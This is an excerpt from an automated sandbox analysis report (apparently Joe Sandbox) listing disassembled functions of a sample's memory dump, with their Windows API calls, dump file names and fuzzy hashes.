                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                                      • String ID:
                                                                      • API String ID: 1592001646-0
                                                                      • Opcode ID: 23899468c4139f065ba0ea1e2ec6fd023f533c2541bebf129f3eef6ff32c211c
                                                                      • Instruction ID: 1702600f4c9a0a5f5b16af652c9c77881a373e3996a15f75d18e33a7ab01b310
                                                                      • Opcode Fuzzy Hash: 23899468c4139f065ba0ea1e2ec6fd023f533c2541bebf129f3eef6ff32c211c
                                                                      • Instruction Fuzzy Hash: 84214A71E00109EFDB10EFA4C945BEEB7F8FF44359F184459E891AB241E730AA46DBA4
                                                                      Function 00CB8FC9 Relevance: 6.1, APIs: 4, Instructions: 78windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00C39BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00C39BB2
                                                                      • GetCursorPos.USER32(?), ref: 00CB9001
                                                                      • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00C77711,?,?,?,?,?), ref: 00CB9016
                                                                      • GetCursorPos.USER32(?), ref: 00CB905E
                                                                      • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00C77711,?,?,?), ref: 00CB9094
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                      • String ID:
                                                                      • API String ID: 2864067406-0
                                                                      • Opcode ID: addecab5eb42efa9c88dc5dd8a887116f84d91b81b36704e236ba4ee8ad93faa
                                                                      • Instruction ID: 1dc229fd2e308fe4cf531e887b1fdf40ba8c8458c2cce9ca3e65a0ae444e469b
                                                                      • Opcode Fuzzy Hash: addecab5eb42efa9c88dc5dd8a887116f84d91b81b36704e236ba4ee8ad93faa
                                                                      • Instruction Fuzzy Hash: CB219F35600018EFCB259F94D898FFE7BB9EB4A361F044155FA1547261C7719A50EB60
                                                                      Function 00C878F5 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 71stringCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00C88D7D: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,00C8790A,?,000000FF,?,00C88754,00000000,?,0000001C,?,?), ref: 00C88D8C
                                                                        • Part of subcall function 00C88D7D: lstrcpyW.KERNEL32(00000000,?,?,00C8790A,?,000000FF,?,00C88754,00000000,?,0000001C,?,?,00000000), ref: 00C88DB2
                                                                        • Part of subcall function 00C88D7D: lstrcmpiW.KERNEL32(00000000,?,00C8790A,?,000000FF,?,00C88754,00000000,?,0000001C,?,?), ref: 00C88DE3
                                                                      • lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,00C88754,00000000,?,0000001C,?,?,00000000), ref: 00C87923
                                                                      • lstrcpyW.KERNEL32(00000000,?,?,00C88754,00000000,?,0000001C,?,?,00000000), ref: 00C87949
                                                                      • lstrcmpiW.KERNEL32(00000002,cdecl,?,00C88754,00000000,?,0000001C,?,?,00000000), ref: 00C87984
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: lstrcmpilstrcpylstrlen
                                                                      • String ID: cdecl
                                                                      • API String ID: 4031866154-3896280584
                                                                      • Opcode ID: a45012c7776a7c9f28d451448e641bc15f15fc220f912542ddb5465da6b2a25f
                                                                      • Instruction ID: 396a50b473ee59098d3ea7ad3d896d23ffa3674f7a27f039a136165770370fb0
                                                                      • Opcode Fuzzy Hash: a45012c7776a7c9f28d451448e641bc15f15fc220f912542ddb5465da6b2a25f
                                                                      • Instruction Fuzzy Hash: F411033A200242ABCF15BF39D844E7A77A9FF95394B50412AF842CB2A4FF31D901D7A5
                                                                      Function 00CB7CC2 Relevance: 6.1, APIs: 4, Instructions: 70COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00CB7D0B
                                                                      • SetWindowLongW.USER32(00000000,000000F0,?), ref: 00CB7D2A
                                                                      • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00CB7D42
                                                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00C9B7AD,00000000), ref: 00CB7D6B
                                                                        • Part of subcall function 00C39BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00C39BB2
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: Window$Long
                                                                      • String ID:
                                                                      • API String ID: 847901565-0
                                                                      • Opcode ID: 794542b85310248ca9826f5e35b3bd3f235cedf7e740632983e6c958c2e99456
                                                                      • Instruction ID: e7f1b3b0ed7e3fa5e510101ae60706d5c4cbe50bb71c88c4e948118aff639460
                                                                      • Opcode Fuzzy Hash: 794542b85310248ca9826f5e35b3bd3f235cedf7e740632983e6c958c2e99456
                                                                      • Instruction Fuzzy Hash: E2116D31615615AFCB109F68CC44BBA3BA5AF853A0F254728FC3AD72F0E7319A51DB90
                                                                      Function 00C81A27 Relevance: 6.1, APIs: 4, Instructions: 56windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 00C81A47
                                                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00C81A59
                                                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00C81A6F
                                                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00C81A8A
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend
                                                                      • String ID:
                                                                      • API String ID: 3850602802-0
                                                                      • Opcode ID: e78a74af2e1627c43e8f72ddfd826d4072b8d9971109cefb5d388923f4ffc125
                                                                      • Instruction ID: 5d9d8afbd35a9af5373dc1a42991617b454bfa34148d9f520f8ee4dde1751fe1
                                                                      • Opcode Fuzzy Hash: e78a74af2e1627c43e8f72ddfd826d4072b8d9971109cefb5d388923f4ffc125
                                                                      • Instruction Fuzzy Hash: 80112A3A901219FFEB109BA5C985FEDBBB8EB08754F240091EA10B7290D6716E51EB94
                                                                      Function 00C4D1CC Relevance: 6.1, APIs: 4, Instructions: 55threadCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CreateThread.KERNEL32(00000000,?,00C4CFF9,00000000,00000004,00000000), ref: 00C4D218
                                                                      • GetLastError.KERNEL32 ref: 00C4D224
                                                                      • __dosmaperr.LIBCMT ref: 00C4D22B
                                                                      • ResumeThread.KERNEL32(00000000), ref: 00C4D249
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: Thread$CreateErrorLastResume__dosmaperr
                                                                      • String ID:
                                                                      • API String ID: 173952441-0
                                                                      • Opcode ID: a41815c1307d9f2b1d96a49826a4f802e87337af06143638f882d58a2f91c9e1
                                                                      • Instruction ID: f843c62e530a8d951989ff9ce82d985505e6887c7333524625b92e2c41645595
                                                                      • Opcode Fuzzy Hash: a41815c1307d9f2b1d96a49826a4f802e87337af06143638f882d58a2f91c9e1
                                                                      • Instruction Fuzzy Hash: 1201D276805214BBDB216BA5DC49BAF7AA9FF81331F100329F926921E0CBB0CD41D6A0
                                                                      Function 00C8E1D6 Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetCurrentThreadId.KERNEL32 ref: 00C8E1FD
                                                                      • MessageBoxW.USER32(?,?,?,?), ref: 00C8E230
                                                                      • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00C8E246
                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00C8E24D
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                      • String ID:
                                                                      • API String ID: 2880819207-0
                                                                      • Opcode ID: 4d9acf4ababf7f2b512151070ecccf5bff3349f075fbb7d090b1f8711cbbb0b4
                                                                      • Instruction ID: 06d75030491b9471f9e05302175721e1afa96e727db224a98b64b3f6d8f5cfbc
                                                                      • Opcode Fuzzy Hash: 4d9acf4ababf7f2b512151070ecccf5bff3349f075fbb7d090b1f8711cbbb0b4
                                                                      • Instruction Fuzzy Hash: 4C11DB76904254BBC701AFA89C45BAE7FADAB45324F144365F925E32A1D6B0CE04C7A1
                                                                      Function 00CB9EF3 Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00C39BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00C39BB2
                                                                      • GetClientRect.USER32(?,?), ref: 00CB9F31
                                                                      • GetCursorPos.USER32(?), ref: 00CB9F3B
                                                                      • ScreenToClient.USER32(?,?), ref: 00CB9F46
                                                                      • DefDlgProcW.USER32(?,00000020,?,00000000,?,?,?), ref: 00CB9F7A
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: Client$CursorLongProcRectScreenWindow
                                                                      • String ID:
                                                                      • API String ID: 4127811313-0
                                                                      • Opcode ID: 4d66e0c55381674ed5fb96949f763c6604eb39dfc9f947683af75f034839132e
                                                                      • Instruction ID: e859a3a67911de5345ae3b8a8d2c1bfa28530f3b7a6c70984e20fbcf857b7b37
                                                                      • Opcode Fuzzy Hash: 4d66e0c55381674ed5fb96949f763c6604eb39dfc9f947683af75f034839132e
                                                                      • Instruction Fuzzy Hash: 7711153290011AEBDB10EFA8D889AFEB7B9FB46321F000555FA11E3150D770BB95DBA1
                                                                      Function 00C2600E Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00C2604C
                                                                      • GetStockObject.GDI32(00000011), ref: 00C26060
                                                                      • SendMessageW.USER32(00000000,00000030,00000000), ref: 00C2606A
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: CreateMessageObjectSendStockWindow
                                                                      • String ID:
                                                                      • API String ID: 3970641297-0
                                                                      • Opcode ID: 0e2f5d1de65431e0cd179008fa6248c785ea942171e269e43d916adf9427a13e
                                                                      • Instruction ID: 59fdcfade2f05c98271b2c96fac80f9b7b5363a8833f1ca335eaa14e8badaf51
                                                                      • Opcode Fuzzy Hash: 0e2f5d1de65431e0cd179008fa6248c785ea942171e269e43d916adf9427a13e
                                                                      • Instruction Fuzzy Hash: 47115B72501558BFEF124FA4AC84FEEBF69EF193A4F040215FA1456110DB329D60EBA4
                                                                      Function 00C53073 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00C213C6,00000000,00000000,?,00C5301A,00C213C6,00000000,00000000,00000000,?,00C5328B,00000006,FlsSetValue), ref: 00C530A5
                                                                      • GetLastError.KERNEL32(?,00C5301A,00C213C6,00000000,00000000,00000000,?,00C5328B,00000006,FlsSetValue,00CC2290,FlsSetValue,00000000,00000364,?,00C52E46), ref: 00C530B1
                                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00C5301A,00C213C6,00000000,00000000,00000000,?,00C5328B,00000006,FlsSetValue,00CC2290,FlsSetValue,00000000), ref: 00C530BF
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: LibraryLoad$ErrorLast
                                                                      • String ID:
                                                                      • API String ID: 3177248105-0
                                                                      • Opcode ID: 85c08fbbd0c3f9ffb6eee7088a75e05580072d1221a375ad905982878cc47cba
                                                                      • Instruction ID: 698b5007c9aff69fe39bab40976c43227e71d03330d8242b0e9daf39640f59bf
                                                                      • Opcode Fuzzy Hash: 85c08fbbd0c3f9ffb6eee7088a75e05580072d1221a375ad905982878cc47cba
                                                                      • Instruction Fuzzy Hash: 8201FC3A301362ABCB324B799C84B6B77989F85BE2B100720FD15E31C0C721DE49C6E4
                                                                      Function 00C87464 Relevance: 6.1, APIs: 4, Instructions: 51registryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000), ref: 00C8747F
                                                                      • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00C87497
                                                                      • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 00C874AC
                                                                      • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 00C874CA
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: Type$Register$FileLoadModuleNameUser
                                                                      • String ID:
                                                                      • API String ID: 1352324309-0
                                                                      • Opcode ID: c5be5420d89e7410b27e27df54aac6a7f24c0b86169757a8f21911a5d8989840
                                                                      • Instruction ID: fa27c44b6cb83ccf4cd8e3230e64038edee82f98c2a54cffcc203c9237bb11f5
                                                                      • Opcode Fuzzy Hash: c5be5420d89e7410b27e27df54aac6a7f24c0b86169757a8f21911a5d8989840
                                                                      • Instruction Fuzzy Hash: 9111A1B1205310ABE7209F54DC48BA67FFCEB80B18F208669A666D6151E770E944DF64
                                                                      Function 00C8B0A8 Relevance: 6.0, APIs: 4, Instructions: 50sleepCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,00C8ACD3,?,00008000), ref: 00C8B0C4
                                                                      • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,00C8ACD3,?,00008000), ref: 00C8B0E9
                                                                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,00C8ACD3,?,00008000), ref: 00C8B0F3
                                                                      • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,00C8ACD3,?,00008000), ref: 00C8B126
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: CounterPerformanceQuerySleep
                                                                      • String ID:
                                                                      • API String ID: 2875609808-0
                                                                      • Opcode ID: e1b09e706da19bcaad6b5ae61c05cbd0084ab73bc964840f76ba49b7be8119bd
                                                                      • Instruction ID: 94a4f7795b5090d2a15d087e5f7cede9182c4b9c01c334dd90e4fa6c1f6c8c78
                                                                      • Opcode Fuzzy Hash: e1b09e706da19bcaad6b5ae61c05cbd0084ab73bc964840f76ba49b7be8119bd
                                                                      • Instruction Fuzzy Hash: 0D115B71C0192CE7CF00EFE9E9987EEBB78FF19715F10418AD991B6181CB305A508B59
                                                                      Function 00CB7E14 Relevance: 6.0, APIs: 4, Instructions: 46COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetWindowRect.USER32(?,?), ref: 00CB7E33
                                                                      • ScreenToClient.USER32(?,?), ref: 00CB7E4B
                                                                      • ScreenToClient.USER32(?,?), ref: 00CB7E6F
                                                                      • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00CB7E8A
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: ClientRectScreen$InvalidateWindow
                                                                      • String ID:
                                                                      • API String ID: 357397906-0
                                                                      • Opcode ID: cf7665f6081254f1dbc0b54861dfcaaaec85560a5c73123a54109257d2d3747a
                                                                      • Instruction ID: a661a35b540bf8485ce04c36039174190c933cd8b23d2e6f120db8ee6551b249
                                                                      • Opcode Fuzzy Hash: cf7665f6081254f1dbc0b54861dfcaaaec85560a5c73123a54109257d2d3747a
                                                                      • Instruction Fuzzy Hash: C81114B9D0024AAFDB41DF98C884AEEBBF5FF08310F505166E915E3210D735AA55CF50
                                                                      Function 00C82DA7 Relevance: 6.0, APIs: 4, Instructions: 34threadwindowtimeCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00C82DC5
                                                                      • GetWindowThreadProcessId.USER32(?,00000000), ref: 00C82DD6
                                                                      • GetCurrentThreadId.KERNEL32 ref: 00C82DDD
                                                                      • AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00C82DE4
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                      • String ID:
                                                                      • API String ID: 2710830443-0
                                                                      • Opcode ID: ecf76087285482e1924c0010b7a6a467f9c689beed336877af1ac201864b1130
                                                                      • Instruction ID: ec1f2d7a074b4aa7f971560d9c8d10cbff0b87987c12e7d2ca3b58676ff7d13a
                                                                      • Opcode Fuzzy Hash: ecf76087285482e1924c0010b7a6a467f9c689beed336877af1ac201864b1130
                                                                      • Instruction Fuzzy Hash: 93E0ED72501224BBD7202B669C8DFEF7F6CEB56BA6F400216B505D10919AA58941C6B0
                                                                      Function 00CB8863 Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00C39639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00C39693
                                                                        • Part of subcall function 00C39639: SelectObject.GDI32(?,00000000), ref: 00C396A2
                                                                        • Part of subcall function 00C39639: BeginPath.GDI32(?), ref: 00C396B9
                                                                        • Part of subcall function 00C39639: SelectObject.GDI32(?,00000000), ref: 00C396E2
                                                                      • MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 00CB8887
                                                                      • LineTo.GDI32(?,?,?), ref: 00CB8894
                                                                      • EndPath.GDI32(?), ref: 00CB88A4
                                                                      • StrokePath.GDI32(?), ref: 00CB88B2
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
